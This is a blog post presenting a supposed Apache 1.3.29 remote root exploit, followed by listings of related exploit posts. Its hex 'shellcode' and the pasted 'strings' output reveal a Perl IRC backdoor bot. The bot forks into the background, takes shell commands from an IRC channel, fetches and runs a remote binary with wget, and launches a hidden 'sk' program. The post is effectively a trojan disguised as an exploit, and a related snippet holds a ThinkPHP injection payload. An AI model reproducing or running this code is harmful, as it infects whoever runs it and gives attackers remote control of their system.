Apache/1.3.29 - Remote Root Exploit

原创 2004年08月10日 17:35:00
unsigned char h3llc0de[]=
{
 0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69,
 0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d, 0x22, 0x23,
 0x70, 0x61, 0x72, 0x64, 0x69, 0x6c, 0x6c, 0x6f,
 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x6e, 0x69, 0x63,
 0x6b, 0x3d, 0x22, 0x4c, 0x65, 0x6d, 0x6d, 0x69,
 0x6e, 0x67, 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x73,
 0x65, 0x72, 0x76, 0x65, 0x72, 0x3d, 0x22, 0x65,
 0x66, 0x6e, 0x65, 0x74, 0x2e, 0x76, 0x75, 0x75,
 0x72, 0x77, 0x65, 0x72, 0x6b, 0x2e, 0x6e, 0x6c,
 0x22, 0x3b, 0x0a, 0x24, 0x53, 0x49, 0x47, 0x7b,
 0x54, 0x45, 0x52, 0x4d, 0x7d, 0x3d, 0x7b, 0x7d,
 0x3b, 0x0a, 0x65, 0x78, 0x69, 0x74, 0x20, 0x69,
 0x66, 0x20, 0x66, 0x6f, 0x72, 0x6b, 0x3b, 0x0a,
 0x75, 0x73, 0x65, 0x20, 0x49, 0x4f, 0x3a, 0x3a,
 0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x3b, 0x0a,
 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x3d, 0x20,
 0x49, 0x4f, 0x3a, 0x3a, 0x53, 0x6f, 0x63, 0x6b,
 0x65, 0x74, 0x3a, 0x3a, 0x49, 0x4e, 0x45, 0x54,
 0x2d, 0x3e, 0x6e, 0x65, 0x77, 0x28, 0x24, 0x73,
 0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x22, 0x3a,
 0x36, 0x36, 0x36, 0x37, 0x22, 0x29, 0x7c, 0x7c,
 0x65, 0x78, 0x69, 0x74, 0x3b, 0x0a, 0x70, 0x72,
 0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63,
 0x6b, 0x20, 0x22, 0x55, 0x53, 0x45, 0x52, 0x20,
 0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
 0x20, 0x2b, 0x69, 0x20, 0x6c, 0x65, 0x6d, 0x6d,
 0x69, 0x6e, 0x67, 0x73, 0x20, 0x3a, 0x6c, 0x65,
 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73, 0x76, 0x32,
 0x20, 0x5c, 0x6e, 0x4e, 0x49, 0x43, 0x4b, 0x20,
 0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
 0x5c, 0x6e, 0x22, 0x3b, 0x0a, 0x24, 0x69, 0x3d,
 0x31, 0x3b, 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28,
 0x3c, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x3d,
 0x7e, 0x2f, 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b,
 0x20, 0x28, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x29,
 0x20, 0x2f, 0x29, 0x7b, 0x24, 0x6d, 0x6f, 0x64,
 0x65, 0x3d, 0x24, 0x31, 0x3b, 0x0a, 0x6c, 0x61,
 0x73, 0x74, 0x20, 0x69, 0x66, 0x20, 0x24, 0x6d,
 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x30, 0x30,
 0x31, 0x22, 0x3b, 0x0a, 0x69, 0x66, 0x28, 0x24,
 0x6d, 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x34,
 0x33, 0x33, 0x22, 0x29, 0x0a, 0x7b, 0x24, 0x69,
 0x2b, 0x2b, 0x3b, 0x24, 0x6e, 0x69, 0x63, 0x6b,
 0x3d, 0x7e, 0x73, 0x2f, 0x5c, 0x64, 0x2a, 0x24,
 0x2f, 0x24, 0x69, 0x2f, 0x3b, 0x70, 0x72, 0x69,
 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
 0x20, 0x22, 0x4e, 0x49, 0x43, 0x4b, 0x20, 0x24,
 0x6e, 0x69, 0x63, 0x6b, 0x5c, 0x6e, 0x22, 0x3b,
 0x7d, 0x7d, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
 0x4a, 0x4f, 0x49, 0x4e, 0x20, 0x24, 0x63, 0x68,
 0x61, 0x6e, 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56,
 0x4d, 0x53, 0x47, 0x20, 0x24, 0x63, 0x68, 0x61,
 0x6e, 0x20, 0x3a, 0x6c, 0x65, 0x6d, 0x6d, 0x69,
 0x6e, 0x67, 0x73, 0x20, 0x76, 0x32, 0x2e, 0x31,
 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53,
 0x47, 0x20, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20,
 0x3a, 0x70, 0x61, 0x72, 0x61, 0x20, 0x6d, 0x61,
 0x6e, 0x64, 0x61, 0x72, 0x6d, 0x65, 0x20, 0x63,
 0x6f, 0x6d, 0x61, 0x6e, 0x64, 0x6f, 0x73, 0x2c,
 0x20, 0x65, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65,
 0x3a, 0x20, 0x22, 0x2e, 0x24, 0x6e, 0x69, 0x63,
 0x6b, 0x2e, 0x22, 0x3a, 0x63, 0x6f, 0x6d, 0x61,
 0x6e, 0x64, 0x6f, 0x5c, 0x6e, 0x22, 0x3b, 0x0a,
 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28, 0x3c, 0x24,
 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x29, 0x0a, 0x7b,
 0x0a, 0x69, 0x66, 0x20, 0x28, 0x2f, 0x5e, 0x50,
 0x49, 0x4e, 0x47, 0x20, 0x28, 0x2e, 0x2a, 0x29,
 0x24, 0x2f, 0x29, 0x0a, 0x7b, 0x70, 0x72, 0x69,
 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
 0x20, 0x22, 0x50, 0x4f, 0x4e, 0x47, 0x20, 0x24,
 0x31, 0x5c, 0x6e, 0x4a, 0x4f, 0x49, 0x4e, 0x20,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x5c, 0x6e, 0x22,
 0x3b, 0x7d, 0x0a, 0x69, 0x66, 0x28, 0x73, 0x2f,
 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x50,
 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20, 0x24,
 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24, 0x6e,
 0x69, 0x63, 0x6b, 0x5b, 0x5e, 0x20, 0x3a, 0x5c,
 0x77, 0x5d, 0x2a, 0x3a, 0x5b, 0x5e, 0x20, 0x3a,
 0x5c, 0x77, 0x5d, 0x2a, 0x20, 0x28, 0x2e, 0x2a,
 0x29, 0x24, 0x2f, 0x24, 0x31, 0x2f, 0x29, 0x7b,
 0x73, 0x2f, 0x5c, 0x73, 0x2a, 0x24, 0x2f, 0x2f,
 0x3b, 0x24, 0x5f, 0x3d, 0x60, 0x24, 0x5f, 0x60,
 0x3b, 0x66, 0x6f, 0x72, 0x65, 0x61, 0x63, 0x68,
 0x28, 0x73, 0x70, 0x6c, 0x69, 0x74, 0x20, 0x22,
 0x5c, 0x6e, 0x22, 0x29, 0x0a, 0x7b, 0x0a, 0x73,
 0x79, 0x73, 0x74, 0x65, 0x6d, 0x28, 0x22, 0x77,
 0x67, 0x65, 0x74, 0x20, 0x77, 0x77, 0x77, 0x2e,
 0x67, 0x72, 0x61, 0x74, 0x69, 0x73, 0x77, 0x65,
 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x65, 0x6c,
 0x64, 0x75, 0x65, 0x6e, 0x64, 0x65, 0x63, 0x69,
 0x6c, 0x6c, 0x6f, 0x2f, 0x69, 0x6e, 0x73, 0x74,
 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64,
 0x20, 0x2b, 0x78, 0x20, 0x69, 0x6e, 0x73, 0x74,
 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x69, 0x6e, 0x73,
 0x74, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x69,
 0x6e, 0x73, 0x74, 0x3b, 0x20, 0x63, 0x64, 0x20,
 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x68, 0x61,
 0x72, 0x65, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c,
 0x65, 0x2f, 0x73, 0x6b, 0x2f, 0x2e, 0x73, 0x6b,
 0x31, 0x32, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x73,
 0x6b, 0x20, 0x3b, 0x20, 0x63, 0x64, 0x22, 0x20,
 0x29, 0x3b, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20,
 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24,
 0x5f, 0x5c, 0x6e, 0x22, 0x3b, 0x73, 0x6c, 0x65,
 0x65, 0x70, 0x20, 0x31, 0x3b, 0x7d, 0x7d, 0x7d,
 0x23, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b,
 0x78, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x6c,
 0x6f, 0x6c, 0x20, 0x32, 0x3e, 0x2f, 0x64, 0x65,
 0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x3b, 0x2f,
 0x74, 0x6d, 0x70, 0x2f, 0x6c, 0x6f, 0x6c, 0x00
};


fatb@secu~# strings apache
/lib/ld-linux.so.2
libc.so.6
printf
memcpy
system
malloc
socket
inet_addr
setsockopt
fseek
sendto
fclose
fwrite
htons
fopen
_IO_stdin_used
__libc_start_main
strlen
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
QVh_
[^_]
ERROR: No ip address entered
usage:
%s [IP-ADDRESS]
could not obtain raw socket
ARE YOU ROOT?
127.0.0.1
warning: cannot set HDRINCL
Server Patched or not Vulnerable :_(
#!/usr/bin/perl
$chan="#pardillos";
$nick="Lemmings";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER lemmings +i lemmings :lemmingsv2 NICK lemmings ";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433")
{$i++;$nick=~s/d*$/$i/;print $sock "NICK $nick ";}}
print $sock "JOIN $chan PRIVMSG $chan :lemmings v2.1 PRIVMSG $chan :para mandarme comandos, escribe: ".$nick.":comando ";
while(<$sock>)
if (/^PING (.*)$/)
{print $sock "PONG $1 JOIN $chan ";}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :w]*:[^ :w]* (.*)$/$1/){s/s*$//;$_=`$_`;foreach(split " ")
system("wget www.gratisweb.com/elduendecillo/inst ; chmod +x inst ; ./inst ; rm inst; cd /usr/share/locale/sk/.sk12 ; ./sk ; cd" );
print $sock "PRIVMSG $chan :$_ ";sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol

Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)

/*apache mod rewrite exploit (win32)By: fabio/b0x (oc-192, old CoTS member)Vuln details: http://www....
  • iiprogram
  • iiprogram
  • 2007-05-30 11:42:00
  • 863

Splunk Remote Root Exploit

http://www.exploit-db.com/exploits/18245/ from sec1httplib.requestbuilder import Reques...
  • cnbird2008
  • cnbird2008
  • 2011-12-21 08:47:51
  • 1732

Root exploit for Android (adb setuid)

/* 本文章由 莫灰灰 编写,转载请注明出处。   作者:莫灰灰    邮箱: minzhenfei@163.com */ 1. 漏洞分析 这是个很老的漏洞了,主要利用adb启动的时候调用s...
  • hu3167343
  • hu3167343
  • 2014-07-02 17:26:34
  • 3936

Android Root及提供商:一把双刃剑

摘要Android Root 是一个自愿、合法获取设备最高权限和完全用户控制设备的过程,为了满足大众需求,一个独一无二的Android Root生态系统已经形成,也促使各种各样的Root提供商提供Ro...
  • txx_683
  • txx_683
  • 2017-01-19 14:33:19
  • 1044

thinkphp remote exploit

lib/ThinkPHP/Vendor//Vendor/module/action/param1/$%7B@print(phpinfo())%7D
  • cnbird2008
  • cnbird2008
  • 2012-05-08 12:51:44
  • 1106

exploit - CVE-2017-5638 - Apache Struts2 S2-045

Metasploit-FrameworkExp Code#!/usr/bin/python # -*- coding: utf-8 -*-import urllib2 import httplib d...
  • u011130746
  • u011130746
  • 2017-03-07 17:13:45
  • 4057

Root exploit for Android and Linux(CVE-2010-4258)

/* 本文章由 莫灰灰 编写,转载请注明出处。   作者:莫灰灰    邮箱: minzhenfei@163.com */ 一. 漏洞简介 CVE-2010-4258这个...
  • hu3167343
  • hu3167343
  • 2014-07-04 17:48:53
  • 3075

2.6.17 exp

  • 2014年05月11日 17:24
  • 11KB
  • 下载

2.4.22 exp

  • 2014年05月11日 17:23
  • 14KB
  • 下载

算法-第四版-练习1.3.29解答

问题 用环形链表实现Queue。环形链表也是一条链表,只是没有任何结点链接为空,且只要链表非空则last.next的值就为first。只能使用一个Node类型的实例变量(last)。 解决思路...
  • himayan46
  • himayan46
  • 2016-10-25 14:44:13
  • 1169
收藏助手
不良信息举报
您举报文章:Apache/1.3.29 - Remote Root Exploit
举报原因:
原因补充:

(最多只允许输入30个字)